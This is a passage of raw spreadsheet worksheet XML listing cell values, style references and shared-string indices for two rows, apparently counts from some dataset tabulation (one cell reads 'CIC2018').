        <v>0</v>
      </c>
      <c r="PD65" s="120">
        <v>0</v>
      </c>
      <c r="PE65" s="120">
        <v>0</v>
      </c>
      <c r="PF65" s="120">
        <v>0</v>
      </c>
      <c r="PG65" s="120"/>
      <c r="PH65" s="120">
        <v>0</v>
      </c>
      <c r="PI65" s="464">
        <v>0</v>
      </c>
      <c r="PJ65" s="120">
        <v>0</v>
      </c>
      <c r="PK65" s="120">
        <v>0</v>
      </c>
      <c r="PL65" s="120">
        <v>0</v>
      </c>
      <c r="PM65" s="120"/>
      <c r="PN65" s="120">
        <v>0</v>
      </c>
      <c r="PO65" s="464">
        <v>0</v>
      </c>
      <c r="PP65" s="120">
        <v>0</v>
      </c>
      <c r="PQ65" s="120">
        <v>0</v>
      </c>
      <c r="PR65" s="120">
        <v>0</v>
      </c>
      <c r="PS65" s="120"/>
      <c r="PT65" s="120">
        <v>0</v>
      </c>
      <c r="PU65" s="464">
        <v>0</v>
      </c>
      <c r="PV65" s="120">
        <v>0</v>
      </c>
      <c r="PW65" s="120">
        <v>0</v>
      </c>
      <c r="PX65" s="120">
        <v>0</v>
      </c>
      <c r="PY65" s="120"/>
      <c r="PZ65" s="120">
        <v>0</v>
      </c>
      <c r="QA65" s="464">
        <v>0</v>
      </c>
      <c r="QB65" s="120">
        <v>0</v>
      </c>
      <c r="QC65" s="120">
        <v>0</v>
      </c>
      <c r="QD65" s="120">
        <v>0</v>
      </c>
      <c r="QE65" s="120"/>
      <c r="QF65" s="120">
        <v>0</v>
      </c>
      <c r="QG65" s="464">
        <v>0</v>
      </c>
      <c r="QH65" s="120">
        <v>289193</v>
      </c>
      <c r="QI65" s="120">
        <v>289193</v>
      </c>
      <c r="QJ65" s="120">
        <v>289193</v>
      </c>
      <c r="QK65" s="120" t="s">
        <v>2542</v>
      </c>
      <c r="QL65" s="120">
        <v>1</v>
      </c>
      <c r="QM65" s="464">
        <v>289193</v>
      </c>
      <c r="QN65" s="120">
        <v>0</v>
      </c>
      <c r="QO65" s="120">
        <v>0</v>
      </c>
      <c r="QP65" s="120">
        <v>0</v>
      </c>
      <c r="QQ65" s="120"/>
      <c r="QR65" s="120">
        <v>0</v>
      </c>
      <c r="QS65" s="464">
        <v>0</v>
      </c>
      <c r="QT65" s="184"/>
      <c r="QU65" s="184"/>
      <c r="QV65" s="184"/>
      <c r="QW65" s="184"/>
      <c r="QX65" s="184"/>
      <c r="QY65" s="184"/>
      <c r="QZ65" s="184"/>
      <c r="RA65" s="184"/>
      <c r="RB65" s="184"/>
      <c r="RC65" s="184"/>
      <c r="RD65" s="184"/>
      <c r="RE65" s="184"/>
      <c r="RF65" s="184"/>
      <c r="RG65" s="184"/>
      <c r="RH65" s="184"/>
      <c r="RI65" s="184"/>
      <c r="RJ65" s="184"/>
      <c r="RK65" s="184"/>
      <c r="RL65" s="184"/>
      <c r="RM65" s="184"/>
      <c r="RN65" s="184"/>
      <c r="RO65" s="184"/>
      <c r="RP65" s="184"/>
      <c r="RQ65" s="184"/>
      <c r="RR65" s="184"/>
      <c r="RS65" s="184"/>
      <c r="RT65" s="184"/>
      <c r="RU65" s="184"/>
      <c r="RV65" s="184"/>
      <c r="RW65" s="184"/>
      <c r="RX65" s="184"/>
      <c r="RY65" s="184"/>
      <c r="RZ65" s="184"/>
      <c r="SA65" s="184"/>
      <c r="SB65" s="184"/>
      <c r="SC65" s="184"/>
      <c r="SD65" s="184"/>
      <c r="SE65" s="184"/>
      <c r="SF65" s="184"/>
      <c r="SG65" s="184"/>
      <c r="SH65" s="184"/>
      <c r="SI65" s="184"/>
      <c r="SJ65" s="184"/>
      <c r="SK65" s="184"/>
      <c r="SL65" s="184"/>
      <c r="SM65" s="184"/>
      <c r="SN65" s="184"/>
      <c r="SO65" s="184"/>
      <c r="SP65" s="184"/>
      <c r="SQ65" s="184"/>
      <c r="SR65" s="184"/>
      <c r="SS65" s="184"/>
      <c r="ST65" s="184"/>
      <c r="SU65" s="184"/>
      <c r="SV65" s="184"/>
      <c r="SW65" s="184"/>
      <c r="SX65" s="184"/>
      <c r="SY65" s="184"/>
      <c r="SZ65" s="184"/>
      <c r="TA65" s="184"/>
      <c r="TB65" s="184"/>
      <c r="TC65" s="184"/>
      <c r="TD65" s="184"/>
      <c r="TE65" s="184"/>
      <c r="TF65" s="184"/>
      <c r="TG65" s="184"/>
      <c r="TH65" s="184"/>
      <c r="TI65" s="184"/>
      <c r="TJ65" s="184"/>
      <c r="TK65" s="184"/>
      <c r="TL65" s="184"/>
      <c r="TM65" s="184"/>
      <c r="TN65" s="184"/>
      <c r="TO65" s="184"/>
      <c r="TP65" s="184"/>
      <c r="TQ65" s="184"/>
      <c r="TR65" s="184"/>
      <c r="TS65" s="184"/>
      <c r="TT65" s="184"/>
      <c r="TU65" s="184"/>
      <c r="TV65" s="184"/>
      <c r="TW65" s="184"/>
      <c r="TX65" s="184"/>
      <c r="TY65" s="184"/>
      <c r="TZ65" s="184"/>
      <c r="UA65" s="184"/>
      <c r="UB65" s="184"/>
      <c r="UC65" s="184"/>
      <c r="UD65" s="184"/>
      <c r="UE65" s="184"/>
      <c r="UF65" s="184"/>
      <c r="UG65" s="184"/>
      <c r="UH65" s="184"/>
      <c r="UI65" s="184"/>
      <c r="UJ65" s="184"/>
      <c r="UK65" s="184"/>
      <c r="UL65" s="184"/>
      <c r="UM65" s="184"/>
      <c r="UN65" s="184"/>
      <c r="UO65" s="184"/>
      <c r="UP65" s="184"/>
      <c r="UQ65" s="184"/>
      <c r="UR65" s="184"/>
      <c r="US65" s="184"/>
      <c r="UT65" s="184"/>
      <c r="UU65" s="184"/>
      <c r="UV65" s="184"/>
      <c r="UW65" s="184"/>
      <c r="UX65" s="184"/>
      <c r="UY65" s="184"/>
      <c r="UZ65" s="184"/>
      <c r="VA65" s="184"/>
      <c r="VB65" s="184"/>
      <c r="VC65" s="184"/>
      <c r="VD65" s="184"/>
      <c r="VE65" s="184"/>
      <c r="VF65" s="184"/>
      <c r="VG65" s="184"/>
      <c r="VH65" s="184"/>
      <c r="VI65" s="184"/>
      <c r="VJ65" s="184"/>
      <c r="VK65" s="184"/>
      <c r="VL65" s="184"/>
      <c r="VM65" s="184"/>
      <c r="VN65" s="184"/>
      <c r="VO65" s="184"/>
      <c r="VP65" s="184"/>
      <c r="VQ65" s="184"/>
      <c r="VR65" s="184"/>
      <c r="VS65" s="184"/>
      <c r="VT65" s="184"/>
      <c r="VU65" s="184"/>
      <c r="VV65" s="184"/>
      <c r="VW65" s="184"/>
      <c r="VX65" s="184"/>
      <c r="VY65" s="184"/>
    </row>
    <row r="66" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A66" s="82" t="s">
        <v>107</v>
      </c>
      <c r="B66" s="83" t="s">
        <v>4</v>
      </c>
      <c r="C66" s="83" t="s">
        <v>466</v>
      </c>
      <c r="D66" s="83" t="s">
        <v>112</v>
      </c>
      <c r="E66" s="83">
        <f t="shared" si="2"/>
        <v>47</v>
      </c>
      <c r="F66" s="83" t="s">
        <v>113</v>
      </c>
      <c r="G66" s="94" t="s">
        <v>1331</v>
      </c>
      <c r="H66" s="83" t="s">
        <v>1332</v>
      </c>
      <c r="I66" s="81" t="s">
        <v>1339</v>
      </c>
      <c r="J66" s="85" t="s">
        <v>795</v>
      </c>
      <c r="K66" s="81" t="s">
        <v>880</v>
      </c>
      <c r="L66" s="81" t="s">
        <v>1340</v>
      </c>
      <c r="M66" s="378" t="s">
        <v>273</v>
      </c>
      <c r="N66" s="74" t="str">
        <f t="shared" si="0"/>
        <v>OK</v>
      </c>
      <c r="O66" s="485" t="str">
        <f t="shared" si="1"/>
        <v>CIC2018</v>
      </c>
      <c r="P66" s="91"/>
      <c r="Q66" s="379" t="s">
        <v>745</v>
      </c>
      <c r="R66" s="92" t="s">
        <v>1341</v>
      </c>
      <c r="S66" s="93" t="s">
        <v>843</v>
      </c>
      <c r="T66" s="92" t="s">
        <v>1342</v>
      </c>
      <c r="U66" s="94" t="s">
        <v>4</v>
      </c>
      <c r="V66" s="95" t="s">
        <v>751</v>
      </c>
      <c r="W66" s="96" t="s">
        <v>1320</v>
      </c>
      <c r="X66" s="97" t="s">
        <v>886</v>
      </c>
      <c r="Y66" s="83" t="s">
        <v>1337</v>
      </c>
      <c r="Z66" s="98" t="s">
        <v>1338</v>
      </c>
      <c r="AA66" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB66" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC66" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD66" s="83"/>
      <c r="AE66" s="83"/>
      <c r="AF66" s="384" t="s">
        <v>745</v>
      </c>
      <c r="AG66" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH66" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI66" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ66" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK66" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL66" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM66" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN66" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO66" s="356" t="s">
        <v>747</v>
      </c>
      <c r="AP66" s="357" t="s">
        <v>745</v>
      </c>
      <c r="AQ66" s="648">
        <v>1074379</v>
      </c>
      <c r="AR66" s="647"/>
      <c r="AS66" s="649">
        <v>524287</v>
      </c>
      <c r="AT66" s="647">
        <v>0</v>
      </c>
      <c r="AU66" s="647">
        <v>524287</v>
      </c>
      <c r="AV66" s="92" t="s">
        <v>4</v>
      </c>
      <c r="AW66" s="649">
        <v>1</v>
      </c>
      <c r="AX66" s="649">
        <v>1</v>
      </c>
      <c r="AY66" s="647">
        <v>0</v>
      </c>
      <c r="AZ66" s="649">
        <v>1</v>
      </c>
      <c r="BA66" s="381"/>
      <c r="BB66" s="101">
        <v>2</v>
      </c>
      <c r="BC66" s="102" t="s">
        <v>1820</v>
      </c>
      <c r="BD66" s="102">
        <v>1</v>
      </c>
      <c r="BE66" s="103" t="s">
        <v>1819</v>
      </c>
      <c r="BF66" s="103">
        <v>1</v>
      </c>
      <c r="BG66" s="104">
        <v>1</v>
      </c>
      <c r="BH66" s="105">
        <v>540</v>
      </c>
      <c r="BI66" s="106" t="s">
        <v>1866</v>
      </c>
      <c r="BJ66" s="497">
        <v>540</v>
      </c>
      <c r="BK66" s="107" t="s">
        <v>1867</v>
      </c>
      <c r="BL66" s="107">
        <v>1</v>
      </c>
      <c r="BM66" s="108">
        <v>540</v>
      </c>
      <c r="BN66" s="109">
        <v>542</v>
      </c>
      <c r="BO66" s="110" t="s">
        <v>2029</v>
      </c>
      <c r="BP66" s="501">
        <v>541</v>
      </c>
      <c r="BQ66" s="111" t="s">
        <v>2030</v>
      </c>
      <c r="BR66" s="111">
        <v>2</v>
      </c>
      <c r="BS66" s="112">
        <v>541</v>
      </c>
      <c r="BT66" s="113">
        <v>374244</v>
      </c>
      <c r="BU66" s="114" t="s">
        <v>3454</v>
      </c>
      <c r="BV66" s="503">
        <v>309773</v>
      </c>
      <c r="BW66" s="115" t="s">
        <v>3455</v>
      </c>
      <c r="BX66" s="115">
        <v>2</v>
      </c>
      <c r="BY66" s="116">
        <v>163462</v>
      </c>
      <c r="BZ66" s="250">
        <v>135269</v>
      </c>
      <c r="CA66" s="251" t="s">
        <v>3456</v>
      </c>
      <c r="CB66" s="505">
        <v>115899</v>
      </c>
      <c r="CC66" s="252" t="s">
        <v>3457</v>
      </c>
      <c r="CD66" s="252">
        <v>5</v>
      </c>
      <c r="CE66" s="253">
        <v>57816</v>
      </c>
      <c r="CF66" s="101">
        <v>509513</v>
      </c>
      <c r="CG66" s="102" t="s">
        <v>3458</v>
      </c>
      <c r="CH66" s="102">
        <v>425672</v>
      </c>
      <c r="CI66" s="103" t="s">
        <v>3459</v>
      </c>
      <c r="CJ66" s="103">
        <v>7</v>
      </c>
      <c r="CK66" s="104">
        <v>163548</v>
      </c>
      <c r="CL66" s="105">
        <v>0</v>
      </c>
      <c r="CM66" s="106">
        <v>0</v>
      </c>
      <c r="CN66" s="497">
        <v>0</v>
      </c>
      <c r="CO66" s="107">
        <v>0</v>
      </c>
      <c r="CP66" s="107">
        <v>0</v>
      </c>
      <c r="CQ66" s="108">
        <v>0</v>
      </c>
      <c r="CR66" s="109">
        <v>0</v>
      </c>
      <c r="CS66" s="110">
        <v>0</v>
      </c>
      <c r="CT66" s="501">
        <v>0</v>
      </c>
      <c r="CU66" s="111">
        <v>0</v>
      </c>
      <c r="CV66" s="111">
        <v>0</v>
      </c>
      <c r="CW66" s="112">
        <v>0</v>
      </c>
      <c r="CX66" s="113">
        <v>542</v>
      </c>
      <c r="CY66" s="114" t="s">
        <v>2029</v>
      </c>
      <c r="CZ66" s="503">
        <v>541</v>
      </c>
      <c r="DA66" s="115" t="s">
        <v>2030</v>
      </c>
      <c r="DB66" s="115">
        <v>2</v>
      </c>
      <c r="DC66" s="116">
        <v>541</v>
      </c>
      <c r="DD66" s="101">
        <v>0</v>
      </c>
      <c r="DE66" s="102">
        <v>0</v>
      </c>
      <c r="DF66" s="102">
        <v>0</v>
      </c>
      <c r="DG66" s="103">
        <v>0</v>
      </c>
      <c r="DH66" s="103">
        <v>0</v>
      </c>
      <c r="DI66" s="104">
        <v>0</v>
      </c>
      <c r="DJ66" s="105">
        <v>0</v>
      </c>
      <c r="DK66" s="106">
        <v>0</v>
      </c>
      <c r="DL66" s="497">
        <v>0</v>
      </c>
      <c r="DM66" s="107">
        <v>0</v>
      </c>
      <c r="DN66" s="107">
        <v>0</v>
      </c>
      <c r="DO66" s="108">
        <v>0</v>
      </c>
      <c r="DP66" s="109">
        <v>0</v>
      </c>
      <c r="DQ66" s="110">
        <v>0</v>
      </c>
      <c r="DR66" s="501">
        <v>0</v>
      </c>
      <c r="DS66" s="111">
        <v>0</v>
      </c>
      <c r="DT66" s="111">
        <v>0</v>
      </c>
      <c r="DU66" s="112">
        <v>0</v>
      </c>
      <c r="DV66" s="113">
        <v>200362</v>
      </c>
      <c r="DW66" s="114" t="s">
        <v>3460</v>
      </c>
      <c r="DX66" s="503">
        <v>163462</v>
      </c>
      <c r="DY66" s="115" t="s">
        <v>1894</v>
      </c>
      <c r="DZ66" s="115">
        <v>1</v>
      </c>
      <c r="EA66" s="116">
        <v>163462</v>
      </c>
      <c r="EB66" s="250">
        <v>0</v>
      </c>
      <c r="EC66" s="251">
        <v>0</v>
      </c>
      <c r="ED66" s="505">
        <v>0</v>
      </c>
      <c r="EE66" s="252">
        <v>0</v>
      </c>
      <c r="EF66" s="252">
        <v>0</v>
      </c>
      <c r="EG66" s="253">
        <v>0</v>
      </c>
      <c r="EH66" s="101">
        <v>200362</v>
      </c>
      <c r="EI66" s="102" t="s">
        <v>3460</v>
      </c>
      <c r="EJ66" s="102">
        <v>163462</v>
      </c>
      <c r="EK66" s="103" t="s">
        <v>1894</v>
      </c>
      <c r="EL66" s="103">
        <v>1</v>
      </c>
      <c r="EM66" s="104">
        <v>163462</v>
      </c>
      <c r="EN66" s="105">
        <v>0</v>
      </c>
      <c r="EO66" s="106">
        <v>0</v>
      </c>
      <c r="EP66" s="497">
        <v>0</v>
      </c>
      <c r="EQ66" s="107">
        <v>0</v>
      </c>
      <c r="ER66" s="107">
        <v>0</v>
      </c>
      <c r="ES66" s="108">
        <v>0</v>
      </c>
      <c r="ET66" s="109">
        <v>0</v>
      </c>
      <c r="EU66" s="110">
        <v>0</v>
      </c>
      <c r="EV66" s="501">
        <v>0</v>
      </c>
      <c r="EW66" s="111">
        <v>0</v>
      </c>
      <c r="EX66" s="111">
        <v>0</v>
      </c>
      <c r="EY66" s="112">
        <v>0</v>
      </c>
      <c r="EZ66" s="113">
        <v>0</v>
      </c>
      <c r="FA66" s="114">
        <v>0</v>
      </c>
      <c r="FB66" s="503">
        <v>0</v>
      </c>
      <c r="FC66" s="115">
        <v>0</v>
      </c>
      <c r="FD66" s="115">
        <v>0</v>
      </c>
      <c r="FE66" s="116">
        <v>0</v>
      </c>
      <c r="FF66" s="101">
        <v>2</v>
      </c>
      <c r="FG66" s="102" t="s">
        <v>1820</v>
      </c>
      <c r="FH66" s="102">
        <v>1</v>
      </c>
      <c r="FI66" s="103" t="s">
        <v>1819</v>
      </c>
      <c r="FJ66" s="103">
        <v>1</v>
      </c>
      <c r="FK66" s="104">
        <v>1</v>
      </c>
      <c r="FL66" s="105">
        <v>540</v>
      </c>
      <c r="FM66" s="106" t="s">
        <v>1866</v>
      </c>
      <c r="FN66" s="497">
        <v>540</v>
      </c>
      <c r="FO66" s="107" t="s">
        <v>1867</v>
      </c>
      <c r="FP66" s="107">
        <v>1</v>
      </c>
      <c r="FQ66" s="108">
        <v>540</v>
      </c>
      <c r="FR66" s="109">
        <v>542</v>
      </c>
      <c r="FS66" s="110" t="s">
        <v>2029</v>
      </c>
      <c r="FT66" s="501">
        <v>541</v>
      </c>
      <c r="FU66" s="111" t="s">
        <v>2030</v>
      </c>
      <c r="FV66" s="111">
        <v>2</v>
      </c>
      <c r="FW66" s="112">
        <v>541</v>
      </c>
      <c r="FX66" s="113">
        <v>173882</v>
      </c>
      <c r="FY66" s="114" t="s">
        <v>3461</v>
      </c>
      <c r="FZ66" s="503">
        <v>146311</v>
      </c>
      <c r="GA66" s="115" t="s">
        <v>3462</v>
      </c>
      <c r="GB66" s="115">
        <v>1</v>
      </c>
      <c r="GC66" s="116">
        <v>146311</v>
      </c>
      <c r="GD66" s="250">
        <v>68159</v>
      </c>
      <c r="GE66" s="251" t="s">
        <v>3463</v>
      </c>
      <c r="GF66" s="505">
        <v>58474</v>
      </c>
      <c r="GG66" s="252" t="s">
        <v>3464</v>
      </c>
      <c r="GH66" s="252">
        <v>4</v>
      </c>
      <c r="GI66" s="253">
        <v>57816</v>
      </c>
      <c r="GJ66" s="101">
        <v>242041</v>
      </c>
      <c r="GK66" s="102" t="s">
        <v>3465</v>
      </c>
      <c r="GL66" s="102">
        <v>204785</v>
      </c>
      <c r="GM66" s="103" t="s">
        <v>3466</v>
      </c>
      <c r="GN66" s="103">
        <v>5</v>
      </c>
      <c r="GO66" s="104">
        <v>158137</v>
      </c>
      <c r="GP66" s="105">
        <v>0</v>
      </c>
      <c r="GQ66" s="106">
        <v>0</v>
      </c>
      <c r="GR66" s="497">
        <v>0</v>
      </c>
      <c r="GS66" s="107">
        <v>0</v>
      </c>
      <c r="GT66" s="107">
        <v>0</v>
      </c>
      <c r="GU66" s="108">
        <v>0</v>
      </c>
      <c r="GV66" s="109">
        <v>0</v>
      </c>
      <c r="GW66" s="110">
        <v>0</v>
      </c>
      <c r="GX66" s="501">
        <v>0</v>
      </c>
      <c r="GY66" s="111">
        <v>0</v>
      </c>
      <c r="GZ66" s="111">
        <v>0</v>
      </c>
      <c r="HA66" s="112">
        <v>0</v>
      </c>
      <c r="HB66" s="113">
        <v>542</v>
      </c>
      <c r="HC66" s="114" t="s">
        <v>2029</v>
      </c>
      <c r="HD66" s="503">
        <v>541</v>
      </c>
      <c r="HE66" s="115" t="s">
        <v>2030</v>
      </c>
      <c r="HF66" s="115">
        <v>2</v>
      </c>
      <c r="HG66" s="116">
        <v>541</v>
      </c>
      <c r="HH66" s="101">
        <v>0</v>
      </c>
      <c r="HI66" s="102">
        <v>0</v>
      </c>
      <c r="HJ66" s="102">
        <v>0</v>
      </c>
      <c r="HK66" s="103">
        <v>0</v>
      </c>
      <c r="HL66" s="103">
        <v>0</v>
      </c>
      <c r="HM66" s="104">
        <v>0</v>
      </c>
      <c r="HN66" s="105">
        <v>0</v>
      </c>
      <c r="HO66" s="106">
        <v>0</v>
      </c>
      <c r="HP66" s="497">
        <v>0</v>
      </c>
      <c r="HQ66" s="107">
        <v>0</v>
      </c>
      <c r="HR66" s="107">
        <v>0</v>
      </c>
      <c r="HS66" s="108">
        <v>0</v>
      </c>
      <c r="HT66" s="109">
        <v>0</v>
      </c>
      <c r="HU66" s="110">
        <v>0</v>
      </c>
      <c r="HV66" s="501">
        <v>0</v>
      </c>
      <c r="HW66" s="111">
        <v>0</v>
      </c>
      <c r="HX66" s="111">
        <v>0</v>
      </c>
      <c r="HY66" s="112">
        <v>0</v>
      </c>
      <c r="HZ66" s="113">
        <v>0</v>
      </c>
      <c r="IA66" s="114">
        <v>0</v>
      </c>
      <c r="IB66" s="503">
        <v>0</v>
      </c>
      <c r="IC66" s="115">
        <v>0</v>
      </c>
      <c r="ID66" s="115">
        <v>0</v>
      </c>
      <c r="IE66" s="116">
        <v>0</v>
      </c>
      <c r="IF66" s="250">
        <v>67110</v>
      </c>
      <c r="IG66" s="251" t="s">
        <v>3467</v>
      </c>
      <c r="IH66" s="505">
        <v>57425</v>
      </c>
      <c r="II66" s="252" t="s">
        <v>3468</v>
      </c>
      <c r="IJ66" s="252">
        <v>1</v>
      </c>
      <c r="IK66" s="253">
        <v>57425</v>
      </c>
      <c r="IL66" s="101">
        <v>67110</v>
      </c>
      <c r="IM66" s="102" t="s">
        <v>3467</v>
      </c>
      <c r="IN66" s="102">
        <v>57425</v>
      </c>
      <c r="IO66" s="103" t="s">
        <v>3468</v>
      </c>
      <c r="IP66" s="103">
        <v>1</v>
      </c>
      <c r="IQ66" s="104">
        <v>57425</v>
      </c>
      <c r="IR66" s="105">
        <v>0</v>
      </c>
      <c r="IS66" s="106">
        <v>0</v>
      </c>
      <c r="IT66" s="497">
        <v>0</v>
      </c>
      <c r="IU66" s="107">
        <v>0</v>
      </c>
      <c r="IV66" s="107">
        <v>0</v>
      </c>
      <c r="IW66" s="108">
        <v>0</v>
      </c>
      <c r="IX66" s="109">
        <v>0</v>
      </c>
      <c r="IY66" s="110">
        <v>0</v>
      </c>
      <c r="IZ66" s="501">
        <v>0</v>
      </c>
      <c r="JA66" s="111">
        <v>0</v>
      </c>
      <c r="JB66" s="111">
        <v>0</v>
      </c>
      <c r="JC66" s="112">
        <v>0</v>
      </c>
      <c r="JD66" s="113">
        <v>0</v>
      </c>
      <c r="JE66" s="114">
        <v>0</v>
      </c>
      <c r="JF66" s="503">
        <v>0</v>
      </c>
      <c r="JG66" s="115">
        <v>0</v>
      </c>
      <c r="JH66" s="115">
        <v>0</v>
      </c>
      <c r="JI66" s="116">
        <v>0</v>
      </c>
      <c r="JJ66" s="101">
        <v>0</v>
      </c>
      <c r="JK66" s="102">
        <v>0</v>
      </c>
      <c r="JL66" s="102">
        <v>0</v>
      </c>
      <c r="JM66" s="103">
        <v>0</v>
      </c>
      <c r="JN66" s="103">
        <v>0</v>
      </c>
      <c r="JO66" s="104">
        <v>0</v>
      </c>
      <c r="JP66" s="105">
        <v>0</v>
      </c>
      <c r="JQ66" s="106">
        <v>0</v>
      </c>
      <c r="JR66" s="497">
        <v>0</v>
      </c>
      <c r="JS66" s="107">
        <v>0</v>
      </c>
      <c r="JT66" s="107">
        <v>0</v>
      </c>
      <c r="JU66" s="108">
        <v>0</v>
      </c>
      <c r="JV66" s="109">
        <v>0</v>
      </c>
      <c r="JW66" s="110">
        <v>0</v>
      </c>
      <c r="JX66" s="501">
        <v>0</v>
      </c>
      <c r="JY66" s="111">
        <v>0</v>
      </c>
      <c r="JZ66" s="111">
        <v>0</v>
      </c>
      <c r="KA66" s="112">
        <v>0</v>
      </c>
      <c r="KB66" s="113">
        <v>0</v>
      </c>
      <c r="KC66" s="114">
        <v>0</v>
      </c>
      <c r="KD66" s="503">
        <v>0</v>
      </c>
      <c r="KE66" s="115">
        <v>0</v>
      </c>
      <c r="KF66" s="115">
        <v>0</v>
      </c>
      <c r="KG66" s="116">
        <v>0</v>
      </c>
      <c r="KH66" s="250">
        <v>0</v>
      </c>
      <c r="KI66" s="251">
        <v>0</v>
      </c>
      <c r="KJ66" s="505">
        <v>0</v>
      </c>
      <c r="KK66" s="252">
        <v>0</v>
      </c>
      <c r="KL66" s="252">
        <v>0</v>
      </c>
      <c r="KM66" s="253">
        <v>0</v>
      </c>
      <c r="KN66" s="101">
        <v>0</v>
      </c>
      <c r="KO66" s="102">
        <v>0</v>
      </c>
      <c r="KP66" s="102">
        <v>0</v>
      </c>
      <c r="KQ66" s="103">
        <v>0</v>
      </c>
      <c r="KR66" s="103">
        <v>0</v>
      </c>
      <c r="KS66" s="104">
        <v>0</v>
      </c>
      <c r="KT66" s="105">
        <v>0</v>
      </c>
      <c r="KU66" s="106">
        <v>0</v>
      </c>
      <c r="KV66" s="497">
        <v>0</v>
      </c>
      <c r="KW66" s="107">
        <v>0</v>
      </c>
      <c r="KX66" s="107">
        <v>0</v>
      </c>
      <c r="KY66" s="108">
        <v>0</v>
      </c>
      <c r="KZ66" s="109">
        <v>0</v>
      </c>
      <c r="LA66" s="110">
        <v>0</v>
      </c>
      <c r="LB66" s="501">
        <v>0</v>
      </c>
      <c r="LC66" s="111">
        <v>0</v>
      </c>
      <c r="LD66" s="111">
        <v>0</v>
      </c>
      <c r="LE66" s="112">
        <v>0</v>
      </c>
      <c r="LF66" s="113">
        <v>0</v>
      </c>
      <c r="LG66" s="114">
        <v>0</v>
      </c>
      <c r="LH66" s="503">
        <v>0</v>
      </c>
      <c r="LI66" s="115">
        <v>0</v>
      </c>
      <c r="LJ66" s="115">
        <v>0</v>
      </c>
      <c r="LK66" s="116">
        <v>0</v>
      </c>
      <c r="LL66" s="117">
        <v>634798</v>
      </c>
      <c r="LM66" s="507">
        <v>634798</v>
      </c>
      <c r="LN66" s="119">
        <v>1</v>
      </c>
      <c r="LO66" s="119">
        <v>6</v>
      </c>
      <c r="LP66" s="119">
        <v>317671</v>
      </c>
      <c r="LQ66" s="119">
        <v>317130</v>
      </c>
      <c r="LR66" s="119">
        <v>317668</v>
      </c>
      <c r="LS66" s="119">
        <v>317671</v>
      </c>
      <c r="LT66" s="382"/>
      <c r="LU66" s="117">
        <v>0</v>
      </c>
      <c r="LV66" s="118">
        <v>0</v>
      </c>
      <c r="LW66" s="507">
        <v>0</v>
      </c>
      <c r="LX66" s="119">
        <v>0</v>
      </c>
      <c r="LY66" s="119">
        <v>0</v>
      </c>
      <c r="LZ66" s="119">
        <v>0</v>
      </c>
      <c r="MA66" s="117">
        <v>0</v>
      </c>
      <c r="MB66" s="118">
        <v>0</v>
      </c>
      <c r="MC66" s="507">
        <v>0</v>
      </c>
      <c r="MD66" s="119">
        <v>0</v>
      </c>
      <c r="ME66" s="119">
        <v>0</v>
      </c>
      <c r="MF66" s="119">
        <v>0</v>
      </c>
      <c r="MG66" s="117">
        <v>317130</v>
      </c>
      <c r="MH66" s="118" t="s">
        <v>4244</v>
      </c>
      <c r="MI66" s="507">
        <v>317130</v>
      </c>
      <c r="MJ66" s="119" t="s">
        <v>3469</v>
      </c>
      <c r="MK66" s="119">
        <v>1</v>
      </c>
      <c r="ML66" s="119">
        <v>317130</v>
      </c>
      <c r="MM66" s="117">
        <v>0</v>
      </c>
      <c r="MN66" s="118">
        <v>0</v>
      </c>
      <c r="MO66" s="507">
        <v>0</v>
      </c>
      <c r="MP66" s="119">
        <v>0</v>
      </c>
      <c r="MQ66" s="119">
        <v>0</v>
      </c>
      <c r="MR66" s="119">
        <v>0</v>
      </c>
      <c r="MS66" s="117">
        <v>0</v>
      </c>
      <c r="MT66" s="118">
        <v>0</v>
      </c>
      <c r="MU66" s="507">
        <v>0</v>
      </c>
      <c r="MV66" s="119">
        <v>0</v>
      </c>
      <c r="MW66" s="119">
        <v>0</v>
      </c>
      <c r="MX66" s="119">
        <v>0</v>
      </c>
      <c r="MY66" s="117">
        <v>0</v>
      </c>
      <c r="MZ66" s="118">
        <v>0</v>
      </c>
      <c r="NA66" s="507">
        <v>0</v>
      </c>
      <c r="NB66" s="119">
        <v>0</v>
      </c>
      <c r="NC66" s="119">
        <v>0</v>
      </c>
      <c r="ND66" s="119">
        <v>0</v>
      </c>
      <c r="NE66" s="117">
        <v>0</v>
      </c>
      <c r="NF66" s="118">
        <v>0</v>
      </c>
      <c r="NG66" s="507">
        <v>0</v>
      </c>
      <c r="NH66" s="119">
        <v>0</v>
      </c>
      <c r="NI66" s="119">
        <v>0</v>
      </c>
      <c r="NJ66" s="119">
        <v>0</v>
      </c>
      <c r="NK66" s="117">
        <v>160862</v>
      </c>
      <c r="NL66" s="118" t="s">
        <v>4388</v>
      </c>
      <c r="NM66" s="507">
        <v>160862</v>
      </c>
      <c r="NN66" s="119" t="s">
        <v>4245</v>
      </c>
      <c r="NO66" s="119">
        <v>2</v>
      </c>
      <c r="NP66" s="119">
        <v>160862</v>
      </c>
      <c r="NQ66" s="117">
        <v>0</v>
      </c>
      <c r="NR66" s="118">
        <v>0</v>
      </c>
      <c r="NS66" s="507">
        <v>0</v>
      </c>
      <c r="NT66" s="119">
        <v>0</v>
      </c>
      <c r="NU66" s="119">
        <v>0</v>
      </c>
      <c r="NV66" s="119">
        <v>0</v>
      </c>
      <c r="NW66" s="117">
        <v>156806</v>
      </c>
      <c r="NX66" s="118" t="s">
        <v>4389</v>
      </c>
      <c r="NY66" s="507">
        <v>156806</v>
      </c>
      <c r="NZ66" s="119" t="s">
        <v>4246</v>
      </c>
      <c r="OA66" s="119">
        <v>4</v>
      </c>
      <c r="OB66" s="119">
        <v>156806</v>
      </c>
      <c r="OC66" s="120">
        <v>1142853</v>
      </c>
      <c r="OD66" s="120">
        <v>1142853</v>
      </c>
      <c r="OE66" s="120">
        <v>4</v>
      </c>
      <c r="OF66" s="121">
        <v>2</v>
      </c>
      <c r="OG66" s="120">
        <v>1074116</v>
      </c>
      <c r="OH66" s="120">
        <v>1074116</v>
      </c>
      <c r="OI66" s="120">
        <v>1074116</v>
      </c>
      <c r="OJ66" s="120">
        <v>1074116</v>
      </c>
